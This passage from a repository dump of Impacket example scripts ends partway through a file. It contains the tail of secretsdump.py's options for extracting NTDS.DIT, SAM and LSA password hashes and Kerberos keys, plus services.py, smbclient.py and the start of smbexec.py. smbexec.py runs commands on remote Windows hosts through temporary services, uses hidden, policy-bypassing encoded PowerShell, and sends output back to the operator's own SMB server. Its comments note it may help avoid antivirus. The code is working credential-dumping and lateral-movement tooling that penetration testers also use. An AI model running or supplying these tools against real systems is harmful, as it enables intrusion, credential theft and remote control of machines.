SYSTEM hive')\n parser.add_argument('-security', action='store', help='SECURITY hive to parse')\n parser.add_argument('-sam', action='store', help='SAM hive to parse')\n parser.add_argument('-ntds', action='store', help='NTDS.DIT file to parse')\n parser.add_argument('-resumefile', action='store', help='resume file name to resume NTDS.DIT session dump (only '\n 'available to DRSUAPI approach). This file will also be used to keep updating the session\\'s '\n 'state')\n parser.add_argument('-skip-sam', action='store_true', help='Do NOT parse the SAM hive on remote system')\n parser.add_argument('-skip-security', action='store_true', help='Do NOT parse the SECURITY hive on remote system')\n parser.add_argument('-outputfile', action='store',\n help='base output filename. Extensions will be added for sam, secrets, cached and ntds')\n parser.add_argument('-use-vss', action='store_true', default=False,\n help='Use the NTDSUTIL VSS method instead of default DRSUAPI')\n parser.add_argument('-rodcNo', action='store', type=int, help='Number of the RODC krbtgt account (only avaiable for Kerb-Key-List approach)')\n parser.add_argument('-rodcKey', action='store', help='AES key of the Read Only Domain Controller (only avaiable for Kerb-Key-List approach)')\n parser.add_argument('-use-keylist', action='store_true', default=False,\n help='Use the Kerb-Key-List method instead of default DRSUAPI')\n parser.add_argument('-exec-method', choices=['smbexec', 'wmiexec', 'mmcexec'], nargs='?', default='smbexec', help='Remote exec '\n 'method to use at target (only when using -use-vss). Default: smbexec')\n parser.add_argument('-use-remoteSSWMI', action='store_true',\n help='Remotely create Shadow Snapshot via WMI and download SAM, SYSTEM and SECURITY from it, the parse locally')\n parser.add_argument('-use-remoteSSWMI-NTDS', action='store_true',\n help='Dump NTDS.DIT also when using the Remote Shadow Snapshot Method via WMI. Use it with dumping from a DC. IMPORTANT: this flag only works when also using -use-remoteSSWMI')\n parser.add_argument('-remoteSSWMI-remote-volume', action='store', default='C:\\\\',\n help='Remote Volume to perform the Shadow Snapshot and download SAM, SYSTEM and SECURITY. It defaults to C:\\\\')\n parser.add_argument('-remoteSSWMI-local-path', action='store', default='.',\n help='Local path to download SAM, SYSTEM and SECURITY from Shadow Snapshot. It defaults to current path')\n\n group = parser.add_argument_group('display options')\n group.add_argument('-just-dc-user', action='store', metavar='USERNAME',\n help='Extract only NTDS.DIT data for the user specified. Only available for DRSUAPI approach. '\n 'Implies also -just-dc switch')\n group.add_argument('-ldapfilter', action='store', metavar='LDAPFILTER',\n help='Extract only NTDS.DIT data for specific users based on an LDAP filter. '\n 'Only available for DRSUAPI approach. Implies also -just-dc switch')\n group.add_argument('-just-dc', action='store_true', default=False,\n help='Extract only NTDS.DIT data (NTLM hashes and Kerberos keys)')\n group.add_argument('-just-dc-ntlm', action='store_true', default=False,\n help='Extract only NTDS.DIT data (NTLM hashes only)')\n group.add_argument('-skip-user', action='store', help='Do NOT extract NTDS.DIT data for the user specified. '\n 'Can provide comma-separated list of users to skip, or text file with one user per line')\n group.add_argument('-pwd-last-set', action='store_true', default=False,\n help='Shows pwdLastSet attribute for each NTDS.DIT account. Doesn\\'t apply to -outputfile data')\n group.add_argument('-user-status', action='store_true', default=False,\n help='Display whether or not the user is disabled')\n group.add_argument('-history', action='store_true', help='Dump password history (NTDS and SAM hashes), and LSA secrets OldVal')\n\n group = parser.add_argument_group('authentication')\n group.add_argument('-hashes', action=\"store\", metavar=\"LMHASH:NTHASH\", help='NTLM hashes, format is LMHASH:NTHASH')\n group.add_argument('-no-pass', action=\"store_true\", help='don\\'t ask for password (useful for -k)')\n group.add_argument('-k', action=\"store_true\", help='Use Kerberos authentication. Grabs credentials from ccache file '\n '(KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use'\n ' the ones specified in the command line')\n group.add_argument('-aesKey', action=\"store\", metavar=\"hex key\", help='AES key to use for Kerberos Authentication'\n ' (128 or 256 bits)')\n group.add_argument('-keytab', action=\"store\", help='Read keys for SPN from keytab file')\n\n group = parser.add_argument_group('connection')\n group.add_argument('-dc-ip', action='store', metavar=\"ip address\", help='IP Address of the domain controller. If '\n 'ommited it use the domain part (FQDN) specified in the target parameter')\n group.add_argument('-target-ip', action='store', metavar=\"ip address\",\n help='IP Address of the target machine. If omitted it will use whatever was specified as target. '\n 'This is useful when target is the NetBIOS name and you cannot resolve it')\n\n if len(sys.argv) == 1:\n parser.print_help()\n sys.exit(1)\n\n options = parser.parse_args()\n\n # Init the example's logger theme\n logger.init(options.ts, options.debug)\n\n domain, username, password, remoteName = parse_target(options.target)\n\n if options.just_dc_user is not None or options.ldapfilter is not None:\n if options.use_vss is True or options.use_remoteSSWMI_NTDS is True:\n logging.error('-just-dc-user switch is not supported in VSS mode nor WMI VSS mode')\n sys.exit(1)\n elif options.resumefile is not None:\n logging.error('resuming a previous NTDS.DIT dump session not compatible with -just-dc-user switch')\n sys.exit(1)\n elif remoteName.upper() == 'LOCAL' and username == '':\n logging.error('-just-dc-user not compatible in LOCAL mode')\n sys.exit(1)\n else:\n # Having this switch on implies not asking for anything else.\n options.just_dc = True\n\n if (options.use_vss is True or options.use_remoteSSWMI_NTDS is True) and options.resumefile is not None:\n logging.error('resuming a previous NTDS.DIT dump session is not supported in VSS mode nor WMI VSS mode')\n sys.exit(1)\n\n if options.use_remoteSSWMI_NTDS is True and options.use_remoteSSWMI is not True:\n logging.error('-use-remoteSSWMI-NTDS requires -use-remoteSSWMI to be specified')\n sys.exit(1)\n\n if options.use_keylist is True and (options.rodcNo is None or options.rodcKey is None):\n logging.error('Both the RODC ID number and the RODC key are required for the Kerb-Key-List approach')\n sys.exit(1)\n\n if remoteName.upper() == 'LOCAL' and username == '' and options.resumefile is not None:\n logging.error('resuming a previous NTDS.DIT dump session is not supported in LOCAL mode')\n sys.exit(1)\n\n if remoteName.upper() == 'LOCAL' and username == '':\n if options.system is None and options.bootkey is None:\n logging.error('Either the SYSTEM hive or bootkey is required for local parsing, check help')\n sys.exit(1)\n else:\n\n if options.target_ip is None:\n options.target_ip = remoteName\n\n if domain is None:\n domain = ''\n\n if options.keytab is not None:\n Keytab.loadKeysFromKeytab(options.keytab, username, domain, options)\n options.k = True\n\n if password == '' and username != '' and options.hashes is None and options.no_pass is False and options.aesKey is None:\n from getpass import getpass\n\n password = getpass(\"Password:\")\n\n if options.aesKey is not None:\n options.k = True\n\n dumper = DumpSecrets(remoteName, username, password, domain, options)\n try:\n dumper.dump()\n except Exception as e:\n if logging.getLogger().level == logging.DEBUG:\n import traceback\n traceback.print_exc()\n logging.error(e)\n" }, { "path": "examples/services.py", "content": "#!/usr/bin/env python\n# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliated companies \n#\n# All rights reserved.\n#\n# This software is provided under a slightly modified version\n# of the Apache Software License. See the accompanying LICENSE file\n# for more information.\n#\n# Description:\n# [MS-SCMR] services common functions for manipulating services\n#\n# Author:\n# Alberto Solino (@agsolino)\n#\n# Reference for:\n# DCE/RPC.\n#\n# TODO:\n# [ ] Check errors\n#\n\nfrom __future__ import division\nfrom __future__ import print_function\nimport sys\nimport argparse\nimport logging\nimport codecs\n\nfrom impacket.examples import logger\nfrom impacket.examples.utils import parse_target\nfrom impacket import version\nfrom impacket.dcerpc.v5 import transport, scmr\nfrom impacket.dcerpc.v5.ndr import NULL\nfrom impacket.crypto import encryptSecret\n\n\nclass SVCCTL:\n\n def __init__(self, username, password, domain, options, port=445):\n self.__username = username\n self.__password = password\n self.__options = options\n self.__port = port\n self.__action = options.action.upper()\n self.__domain = domain\n self.__lmhash = ''\n self.__nthash = ''\n self.__aesKey = options.aesKey\n self.__doKerberos = options.k\n self.__kdcHost = options.dc_ip\n\n if options.hashes is not None:\n self.__lmhash, self.__nthash = options.hashes.split(':')\n\n def run(self, remoteName, remoteHost):\n\n stringbinding = r'ncacn_np:%s[\\pipe\\svcctl]' % remoteName\n logging.debug('StringBinding %s'%stringbinding)\n rpctransport = transport.DCERPCTransportFactory(stringbinding)\n rpctransport.set_dport(self.__port)\n rpctransport.setRemoteHost(remoteHost)\n if hasattr(rpctransport, 'set_credentials'):\n # This method exists only for selected protocol sequences.\n rpctransport.set_credentials(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash, self.__aesKey)\n\n rpctransport.set_kerberos(self.__doKerberos, self.__kdcHost)\n self.doStuff(rpctransport)\n\n def doStuff(self, rpctransport):\n dce = rpctransport.get_dce_rpc()\n #dce.set_credentials(self.__username, self.__password)\n dce.connect()\n #dce.set_max_fragment_size(1)\n #dce.set_auth_level(ntlm.NTLM_AUTH_PKT_PRIVACY)\n #dce.set_auth_level(ntlm.NTLM_AUTH_PKT_INTEGRITY)\n dce.bind(scmr.MSRPC_UUID_SCMR)\n #rpc = svcctl.DCERPCSvcCtl(dce)\n rpc = dce\n ans = scmr.hROpenSCManagerW(rpc)\n scManagerHandle = ans['lpScHandle']\n if self.__action != 'LIST' and self.__action != 'CREATE':\n ans = scmr.hROpenServiceW(rpc, scManagerHandle, self.__options.name+'\\x00')\n serviceHandle = ans['lpServiceHandle']\n\n if self.__action == 'START':\n logging.info(\"Starting service %s\" % self.__options.name)\n scmr.hRStartServiceW(rpc, serviceHandle)\n scmr.hRCloseServiceHandle(rpc, serviceHandle)\n elif self.__action == 'STOP':\n logging.info(\"Stopping service %s\" % self.__options.name)\n scmr.hRControlService(rpc, serviceHandle, scmr.SERVICE_CONTROL_STOP)\n scmr.hRCloseServiceHandle(rpc, serviceHandle)\n elif self.__action == 'DELETE':\n logging.info(\"Deleting service %s\" % self.__options.name)\n scmr.hRDeleteService(rpc, serviceHandle)\n scmr.hRCloseServiceHandle(rpc, serviceHandle)\n elif self.__action == 'CONFIG':\n logging.info(\"Querying service config for %s\" % self.__options.name)\n resp = scmr.hRQueryServiceConfigW(rpc, serviceHandle)\n print(\"TYPE : %2d - \" % resp['lpServiceConfig']['dwServiceType'], end=' ')\n if resp['lpServiceConfig']['dwServiceType'] & 0x1:\n print(\"SERVICE_KERNEL_DRIVER \", end=' ')\n if resp['lpServiceConfig']['dwServiceType'] & 0x2:\n print(\"SERVICE_FILE_SYSTEM_DRIVER \", end=' ')\n if resp['lpServiceConfig']['dwServiceType'] & 0x10:\n print(\"SERVICE_WIN32_OWN_PROCESS \", end=' ')\n if resp['lpServiceConfig']['dwServiceType'] & 0x20:\n print(\"SERVICE_WIN32_SHARE_PROCESS \", end=' ')\n if resp['lpServiceConfig']['dwServiceType'] & 0x100:\n print(\"SERVICE_INTERACTIVE_PROCESS \", end=' ')\n print(\"\")\n print(\"START_TYPE : %2d - \" % resp['lpServiceConfig']['dwStartType'], end=' ')\n if resp['lpServiceConfig']['dwStartType'] == 0x0:\n print(\"BOOT START\")\n elif resp['lpServiceConfig']['dwStartType'] == 0x1:\n print(\"SYSTEM START\")\n elif resp['lpServiceConfig']['dwStartType'] == 0x2:\n print(\"AUTO START\")\n elif resp['lpServiceConfig']['dwStartType'] == 0x3:\n print(\"DEMAND START\")\n elif resp['lpServiceConfig']['dwStartType'] == 0x4:\n print(\"DISABLED\")\n else:\n print(\"UNKNOWN\")\n\n print(\"ERROR_CONTROL : %2d - \" % resp['lpServiceConfig']['dwErrorControl'], end=' ')\n if resp['lpServiceConfig']['dwErrorControl'] == 0x0:\n print(\"IGNORE\")\n elif resp['lpServiceConfig']['dwErrorControl'] == 0x1:\n print(\"NORMAL\")\n elif resp['lpServiceConfig']['dwErrorControl'] == 0x2:\n print(\"SEVERE\")\n elif resp['lpServiceConfig']['dwErrorControl'] == 0x3:\n print(\"CRITICAL\")\n else:\n print(\"UNKNOWN\")\n print(\"BINARY_PATH_NAME : %s\" % resp['lpServiceConfig']['lpBinaryPathName'][:-1])\n print(\"LOAD_ORDER_GROUP : %s\" % resp['lpServiceConfig']['lpLoadOrderGroup'][:-1])\n print(\"TAG : %d\" % resp['lpServiceConfig']['dwTagId'])\n print(\"DISPLAY_NAME : %s\" % resp['lpServiceConfig']['lpDisplayName'][:-1])\n print(\"DEPENDENCIES : %s\" % resp['lpServiceConfig']['lpDependencies'][:-1])\n print(\"SERVICE_START_NAME: %s\" % resp['lpServiceConfig']['lpServiceStartName'][:-1])\n elif self.__action == 'STATUS':\n print(\"Querying status for %s\" % self.__options.name)\n resp = scmr.hRQueryServiceStatus(rpc, serviceHandle)\n print(\"%30s - \" % self.__options.name, end=' ')\n state = resp['lpServiceStatus']['dwCurrentState']\n if state == scmr.SERVICE_CONTINUE_PENDING:\n print(\"CONTINUE PENDING\")\n elif state == scmr.SERVICE_PAUSE_PENDING:\n print(\"PAUSE PENDING\")\n elif state == scmr.SERVICE_PAUSED:\n print(\"PAUSED\")\n elif state == scmr.SERVICE_RUNNING:\n print(\"RUNNING\")\n elif state == scmr.SERVICE_START_PENDING:\n print(\"START PENDING\")\n elif state == scmr.SERVICE_STOP_PENDING:\n print(\"STOP PENDING\")\n elif state == scmr.SERVICE_STOPPED:\n print(\"STOPPED\")\n else:\n print(\"UNKNOWN\")\n elif self.__action == 'LIST':\n logging.info(\"Listing services available on target\")\n #resp = rpc.EnumServicesStatusW(scManagerHandle, svcctl.SERVICE_WIN32_SHARE_PROCESS )\n #resp = rpc.EnumServicesStatusW(scManagerHandle, svcctl.SERVICE_WIN32_OWN_PROCESS )\n #resp = rpc.EnumServicesStatusW(scManagerHandle, serviceType = svcctl.SERVICE_FILE_SYSTEM_DRIVER, serviceState = svcctl.SERVICE_STATE_ALL )\n resp = scmr.hREnumServicesStatusW(rpc, scManagerHandle)\n for i in range(len(resp)):\n print(\"%30s - %70s - \" % (resp[i]['lpServiceName'][:-1], resp[i]['lpDisplayName'][:-1]), end=' ')\n state = resp[i]['ServiceStatus']['dwCurrentState']\n if state == scmr.SERVICE_CONTINUE_PENDING:\n print(\"CONTINUE PENDING\")\n elif state == scmr.SERVICE_PAUSE_PENDING:\n print(\"PAUSE PENDING\")\n elif state == scmr.SERVICE_PAUSED:\n print(\"PAUSED\")\n elif state == scmr.SERVICE_RUNNING:\n print(\"RUNNING\")\n elif state == scmr.SERVICE_START_PENDING:\n print(\"START PENDING\")\n elif state == scmr.SERVICE_STOP_PENDING:\n print(\"STOP PENDING\")\n elif state == scmr.SERVICE_STOPPED:\n print(\"STOPPED\")\n else:\n print(\"UNKNOWN\")\n print(\"Total Services: %d\" % len(resp))\n elif self.__action == 'CREATE':\n logging.info(\"Creating service %s\" % self.__options.name)\n scmr.hRCreateServiceW(rpc, scManagerHandle, self.__options.name + '\\x00', self.__options.display + '\\x00',\n lpBinaryPathName=self.__options.path + '\\x00')\n elif self.__action == 'CHANGE':\n logging.info(\"Changing service config for %s\" % self.__options.name)\n if self.__options.start_type is not None:\n start_type = int(self.__options.start_type)\n else:\n start_type = scmr.SERVICE_NO_CHANGE\n if self.__options.service_type is not None:\n service_type = int(self.__options.service_type)\n else:\n service_type = scmr.SERVICE_NO_CHANGE\n\n if self.__options.display is not None:\n display = self.__options.display + '\\x00'\n else:\n display = NULL\n \n if self.__options.path is not None:\n path = self.__options.path + '\\x00'\n else:\n path = NULL\n \n if self.__options.start_name is not None:\n start_name = self.__options.start_name + '\\x00'\n else:\n start_name = NULL \n\n if self.__options.password is not None:\n s = rpctransport.get_smb_connection()\n key = s.getSessionKey()\n try:\n password = (self.__options.password+'\\x00').encode('utf-16le')\n except UnicodeDecodeError:\n import sys\n password = (self.__options.password+'\\x00').decode(sys.getfilesystemencoding()).encode('utf-16le')\n password = encryptSecret(key, password)\n else:\n password = NULL\n \n\n #resp = scmr.hRChangeServiceConfigW(rpc, serviceHandle, display, path, service_type, start_type, start_name, password)\n scmr.hRChangeServiceConfigW(rpc, serviceHandle, service_type, start_type, scmr.SERVICE_ERROR_IGNORE, path,\n NULL, NULL, NULL, 0, start_name, password, 0, display)\n scmr.hRCloseServiceHandle(rpc, serviceHandle)\n else:\n logging.error(\"Unknown action %s\" % self.__action)\n\n scmr.hRCloseServiceHandle(rpc, scManagerHandle)\n\n dce.disconnect()\n\n return \n\n\n# Process command-line arguments.\nif __name__ == '__main__':\n # Explicitly changing the stdout encoding format\n if sys.stdout.encoding is None:\n # Output is redirected to a file\n sys.stdout = codecs.getwriter('utf8')(sys.stdout)\n print(version.BANNER)\n\n parser = argparse.ArgumentParser(add_help = True, description = \"Windows Service manipulation script.\")\n\n parser.add_argument('target', action='store', help='[[domain/]username[:password]@]')\n parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')\n parser.add_argument('-ts', action='store_true', help='Adds timestamp to every logging output')\n subparsers = parser.add_subparsers(help='actions', dest='action')\n \n # A start command\n start_parser = subparsers.add_parser('start', help='starts the service')\n start_parser.add_argument('-name', action='store', required=True, help='service name')\n\n # A stop command\n stop_parser = subparsers.add_parser('stop', help='stops the service')\n stop_parser.add_argument('-name', action='store', required=True, help='service name')\n\n # A delete command\n delete_parser = subparsers.add_parser('delete', help='deletes the service')\n delete_parser.add_argument('-name', action='store', required=True, help='service name')\n\n # A status command\n status_parser = subparsers.add_parser('status', help='returns service status')\n status_parser.add_argument('-name', action='store', required=True, help='service name')\n\n # A config command\n config_parser = subparsers.add_parser('config', help='returns service configuration')\n config_parser.add_argument('-name', action='store', required=True, help='service name')\n\n # A list command\n list_parser = subparsers.add_parser('list', help='list available services')\n\n # A create command\n create_parser = subparsers.add_parser('create', help='create a service')\n create_parser.add_argument('-name', action='store', required=True, help='service name')\n create_parser.add_argument('-display', action='store', required=True, help='display name')\n create_parser.add_argument('-path', action='store', required=True, help='binary path')\n\n # A change command\n create_parser = subparsers.add_parser('change', help='change a service configuration')\n create_parser.add_argument('-name', action='store', required=True, help='service name')\n create_parser.add_argument('-display', action='store', required=False, help='display name')\n create_parser.add_argument('-path', action='store', required=False, help='binary path')\n create_parser.add_argument('-service_type', action='store', required=False, help='service type')\n create_parser.add_argument('-start_type', action='store', required=False, help='service start type')\n create_parser.add_argument('-start_name', action='store', required=False, help='string that specifies the name of '\n 'the account under which the service should run')\n create_parser.add_argument('-password', action='store', required=False, help='string that contains the password of '\n 'the account whose name was specified by the start_name parameter')\n\n group = parser.add_argument_group('authentication')\n\n group.add_argument('-hashes', action=\"store\", metavar = \"LMHASH:NTHASH\", help='NTLM hashes, format is LMHASH:NTHASH')\n group.add_argument('-no-pass', action=\"store_true\", help='don\\'t ask for password (useful for -k)')\n group.add_argument('-k', action=\"store_true\", help='Use Kerberos authentication. Grabs credentials from ccache file '\n '(KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the '\n 'ones specified in the command line')\n group.add_argument('-aesKey', action=\"store\", metavar = \"hex key\", help='AES key to use for Kerberos Authentication '\n '(128 or 256 bits)')\n\n group = parser.add_argument_group('connection')\n\n group.add_argument('-dc-ip', action='store',metavar = \"ip address\", help='IP Address of the domain controller. If '\n 'ommited it use the domain part (FQDN) specified in the target parameter')\n group.add_argument('-target-ip', action='store', metavar=\"ip address\", help='IP Address of the target machine. If '\n 'ommited it will use whatever was specified as target. This is useful when target is the NetBIOS '\n 'name and you cannot resolve it')\n group.add_argument('-port', choices=['139', '445'], nargs='?', default='445', metavar=\"destination port\",\n help='Destination port to connect to SMB Server')\n \n if len(sys.argv)==1:\n parser.print_help()\n sys.exit(1)\n\n options = parser.parse_args()\n # Init the example's logger theme\n logger.init(options.ts, options.debug)\n\n domain, username, password, remoteName = parse_target(options.target)\n\n if domain is None:\n domain = ''\n\n if options.target_ip is None:\n options.target_ip = remoteName\n\n if options.aesKey is not None:\n options.k = True\n\n if password == '' and username != '' and options.hashes is None and options.no_pass is False and options.aesKey is None:\n from getpass import getpass\n password = getpass(\"Password:\")\n\n services = SVCCTL(username, password, domain, options, int(options.port))\n try:\n services.run(remoteName, options.target_ip)\n except Exception as e:\n if logging.getLogger().level == logging.DEBUG:\n import traceback\n traceback.print_exc()\n logging.error(str(e))\n" }, { "path": "examples/smbclient.py", "content": "#!/usr/bin/env python\n# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliated companies \n#\n# All rights reserved.\n#\n# This software is provided under a slightly modified version\n# of the Apache Software License. See the accompanying LICENSE file\n# for more information.\n#\n# Description:\n# Mini shell using some of the SMB functionality of the library\n#\n# Author:\n# Alberto Solino (@agsolino)\n#\n# Reference for:\n# SMB DCE/RPC\n#\n\nfrom __future__ import division\nfrom __future__ import print_function\nimport sys\nimport logging\nimport argparse\nfrom impacket.examples import logger\nfrom impacket.examples.utils import parse_target\nfrom impacket.examples.smbclient import MiniImpacketShell\nfrom impacket import version\nfrom impacket.smbconnection import SMBConnection\n\ndef main():\n print(version.BANNER)\n parser = argparse.ArgumentParser(add_help = True, description = \"SMB client implementation.\")\n\n parser.add_argument('target', action='store', help='[[domain/]username[:password]@]')\n parser.add_argument('-inputfile', type=argparse.FileType('r'), help='input file with commands to execute in the mini shell')\n parser.add_argument('-outputfile', action='store', help='Output file to log smbclient actions in')\n parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')\n parser.add_argument('-ts', action='store_true', help='Adds timestamp to every logging output')\n\n group = parser.add_argument_group('authentication')\n\n group.add_argument('-hashes', action=\"store\", metavar = \"LMHASH:NTHASH\", help='NTLM hashes, format is LMHASH:NTHASH')\n group.add_argument('-no-pass', action=\"store_true\", help='don\\'t ask for password (useful for -k)')\n group.add_argument('-k', action=\"store_true\", help='Use Kerberos authentication. Grabs credentials from ccache file '\n '(KRB5CCNAME) based on target parameters. If valid credentials '\n 'cannot be found, it will use the ones specified in the command '\n 'line')\n group.add_argument('-aesKey', action=\"store\", metavar = \"hex key\", help='AES key to use for Kerberos Authentication '\n '(128 or 256 bits)')\n\n group = parser.add_argument_group('connection')\n\n group.add_argument('-dc-ip', action='store', metavar=\"ip address\",\n help='IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in '\n 'the target parameter')\n group.add_argument('-target-ip', action='store', metavar=\"ip address\",\n help='IP Address of the target machine. If omitted it will use whatever was specified as target. '\n 'This is useful when target is the NetBIOS name and you cannot resolve it')\n group.add_argument('-port', choices=['139', '445'], nargs='?', default='445', metavar=\"destination port\",\n help='Destination port to connect to SMB Server')\n\n if len(sys.argv)==1:\n parser.print_help()\n sys.exit(1)\n\n options = parser.parse_args()\n # Init the example's logger theme\n logger.init(options.ts, options.debug)\n\n domain, username, password, address = parse_target(options.target)\n\n if options.target_ip is None:\n options.target_ip = address\n\n if domain is None:\n domain = ''\n\n if password == '' and username != '' and options.hashes is None and options.no_pass is False and options.aesKey is None:\n from getpass import getpass\n password = getpass(\"Password:\")\n\n if options.aesKey is not None:\n options.k = True\n\n if options.hashes is not None:\n lmhash, nthash = options.hashes.split(':')\n else:\n lmhash = ''\n nthash = ''\n\n try:\n smbClient = SMBConnection(address, options.target_ip, sess_port=int(options.port))\n if options.k is True:\n smbClient.kerberosLogin(username, password, domain, lmhash, nthash, options.aesKey, options.dc_ip )\n else:\n smbClient.login(username, password, domain, lmhash, nthash)\n\n shell = MiniImpacketShell(smbClient, None, options.outputfile)\n\n if options.outputfile is not None:\n f = open(options.outputfile, 'a')\n f.write('=' * 20 + '\\n' + options.target_ip + '\\n' + '=' * 20 + '\\n')\n f.close()\n\n if options.inputfile is not None:\n logging.info(\"Executing commands from %s\" % options.inputfile.name)\n for line in options.inputfile.readlines():\n if line[0] != '#':\n print(\"# %s\" % line, end=' ')\n shell.onecmd(line)\n else:\n print(line, end=' ')\n else:\n shell.cmdloop()\n\n except Exception as e:\n if logging.getLogger().level == logging.DEBUG:\n import traceback\n traceback.print_exc()\n logging.error(str(e))\n\nif __name__ == \"__main__\":\n main()\n" }, { "path": "examples/smbexec.py", "content": "#!/usr/bin/env python\n# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliated companies \n#\n# All rights reserved.\n#\n# This software is provided under a slightly modified version\n# of the Apache Software License. See the accompanying LICENSE file\n# for more information.\n#\n# Description:\n# A similar approach to psexec w/o using RemComSvc. The technique is described here\n# https://web.archive.org/web/20190515131124/https://www.optiv.com/blog/owning-computers-without-shell-access\n# Our implementation goes one step further, instantiating a local smbserver to receive the\n# output of the commands. This is useful in the situation where the target machine does NOT\n# have a writeable share available.\n# Keep in mind that, although this technique might help avoiding AVs, there are a lot of\n# event logs generated and you can't expect executing tasks that will last long since Windows\n# will kill the process since it's not responding as a Windows service.\n# Certainly not a stealthy way.\n#\n# This script works in two ways:\n# 1) share mode: you specify a share, and everything is done through that share.\n# 2) server mode: if for any reason there's no share available, this script will launch a local\n# SMB server, so the output of the commands executed are sent back by the target machine\n# into a locally shared folder. Keep in mind you would need root access to bind to port 445\n# in the local machine.\n#\n# Author:\n# beto (@agsolino)\n#\n# Reference for:\n# DCE/RPC and SMB.\n#\n\nfrom __future__ import division\nfrom __future__ import print_function\nimport sys\nimport os\nimport random\nimport string\nimport cmd\nimport argparse\ntry:\n import ConfigParser\nexcept ImportError:\n import configparser as ConfigParser\nimport logging\nfrom threading import Thread\nfrom base64 import b64encode\n\nfrom impacket.examples import logger\nfrom impacket.examples.utils import parse_target\nfrom impacket import version, smbserver\nfrom impacket.dcerpc.v5 import transport, scmr\nfrom impacket.krb5.keytab import Keytab\n\nOUTPUT_FILENAME = '__output_' + ''.join([random.choice(string.ascii_letters) for i in range(8)])\nSMBSERVER_DIR = '__tmp'\nDUMMY_SHARE = 'TMP'\nCODEC = sys.stdout.encoding\n\nclass SMBServer(Thread):\n def __init__(self):\n Thread.__init__(self)\n self.smb = None\n\n def cleanup_server(self):\n logging.info('Cleaning up..')\n os.rmdir(SMBSERVER_DIR)\n\n def run(self):\n # Here we write a mini config for the server\n smbConfig = ConfigParser.ConfigParser()\n smbConfig.add_section('global')\n smbConfig.set('global','server_name','server_name')\n smbConfig.set('global','server_os','UNIX')\n smbConfig.set('global','server_domain','WORKGROUP')\n smbConfig.set('global','log_file','None')\n smbConfig.set('global','credentials_file','')\n\n # Let's add a dummy share\n smbConfig.add_section(DUMMY_SHARE)\n smbConfig.set(DUMMY_SHARE,'comment','')\n smbConfig.set(DUMMY_SHARE,'read only','no')\n smbConfig.set(DUMMY_SHARE,'share type','0')\n smbConfig.set(DUMMY_SHARE,'path',SMBSERVER_DIR)\n\n # IPC always needed\n smbConfig.add_section('IPC$')\n smbConfig.set('IPC$','comment','')\n smbConfig.set('IPC$','read only','yes')\n smbConfig.set('IPC$','share type','3')\n smbConfig.set('IPC$','path','')\n\n self.smb = smbserver.SMBSERVER(('0.0.0.0',445), config_parser = smbConfig)\n logging.info('Creating tmp directory')\n try:\n os.mkdir(SMBSERVER_DIR)\n except Exception as e:\n logging.critical(str(e))\n pass\n logging.info('Setting up SMB Server')\n self.smb.processConfigFile()\n logging.info('Ready to listen...')\n try:\n self.smb.serve_forever()\n except:\n pass\n\n def stop(self):\n self.cleanup_server()\n self.smb.socket.close()\n self.smb.server_close()\n self._Thread__stop()\n\nclass CMDEXEC:\n def __init__(self, username='', password='', domain='', hashes=None, aesKey=None, doKerberos=None,\n kdcHost=None, mode=None, share=None, port=445, serviceName=None, shell_type=None):\n\n self.__username = username\n self.__password = password\n self.__port = port\n self.__domain = domain\n self.__lmhash = ''\n self.__nthash = ''\n self.__aesKey = aesKey\n self.__doKerberos = doKerberos\n self.__kdcHost = kdcHost\n self.__share = share\n self.__mode = mode\n self.__shell_type = shell_type\n self.shell = None\n if hashes is not None:\n self.__lmhash, self.__nthash = hashes.split(':')\n\n if serviceName is None:\n self.__serviceName = ''.join([random.choice(string.ascii_letters) for i in range(8)])\n else:\n self.__serviceName = serviceName\n\n def run(self, remoteName, remoteHost):\n stringbinding = r'ncacn_np:%s[\\pipe\\svcctl]' % remoteName\n logging.debug('StringBinding %s'%stringbinding)\n rpctransport = transport.DCERPCTransportFactory(stringbinding)\n rpctransport.set_dport(self.__port)\n rpctransport.setRemoteHost(remoteHost)\n if hasattr(rpctransport, 'set_credentials'):\n # This method exists only for selected protocol sequences.\n rpctransport.set_credentials(self.__username, self.__password, self.__domain, self.__lmhash,\n self.__nthash, self.__aesKey)\n rpctransport.set_kerberos(self.__doKerberos, self.__kdcHost)\n\n self.shell = None\n try:\n if self.__mode == 'SERVER':\n serverThread = SMBServer()\n serverThread.daemon = True\n serverThread.start()\n self.shell = RemoteShell(self.__share, rpctransport, self.__mode, self.__serviceName, self.__shell_type)\n self.shell.cmdloop()\n if self.__mode == 'SERVER':\n serverThread.stop()\n except (Exception, KeyboardInterrupt) as e:\n if logging.getLogger().level == logging.DEBUG:\n import traceback\n traceback.print_exc()\n logging.critical(str(e))\n if self.shell is not None:\n self.shell.finish()\n sys.stdout.flush()\n sys.exit(1)\n\nclass RemoteShell(cmd.Cmd):\n def __init__(self, share, rpc, mode, serviceName, shell_type):\n cmd.Cmd.__init__(self)\n self.__share = share\n self.__mode = mode\n self.__output = '\\\\\\\\%COMPUTERNAME%\\\\' + self.__share + '\\\\' + OUTPUT_FILENAME\n self.__outputBuffer = b''\n self.__command = ''\n self.__shell = '%COMSPEC% /Q /c '\n self.__shell_type = shell_type\n self.__pwsh = 'powershell.exe -NoP -NoL -sta -NonI -W Hidden -Exec Bypass -Enc '\n self.__serviceName = serviceName\n self.__rpc = rpc\n self.intro = '[!] Launching semi-interactive shell - Careful what you execute'\n\n self.__scmr = rpc.get_dce_rpc()\n try:\n self.__scmr.connect()\n except Exception as e:\n logging.critical(str(e))\n sys.exit(1)\n\n s = rpc.get_smb_connection()\n\n # We don't wanna deal with timeouts from now on.\n s.setTimeout(100000)\n if mode == 'SERVER':\n myIPaddr = s.getSMBServer().get_socket().getsockname()[0]\n self.__copyBack = 'copy %s \\\\\\\\%s\\\\%s' % (self.__output, myIPaddr, DUMMY_SHARE)\n\n self.__scmr.bind(scmr.MSRPC_UUID_SCMR)\n resp = scmr.hROpenSCManagerW(self.__scmr)\n self.__scHandle = resp['lpScHandle']\n self.transferClient = rpc.get_smb_connection()\n self.do_cd('')\n\n def finish(self): \n # Just in case the ouput file is still in the share\n try:\n 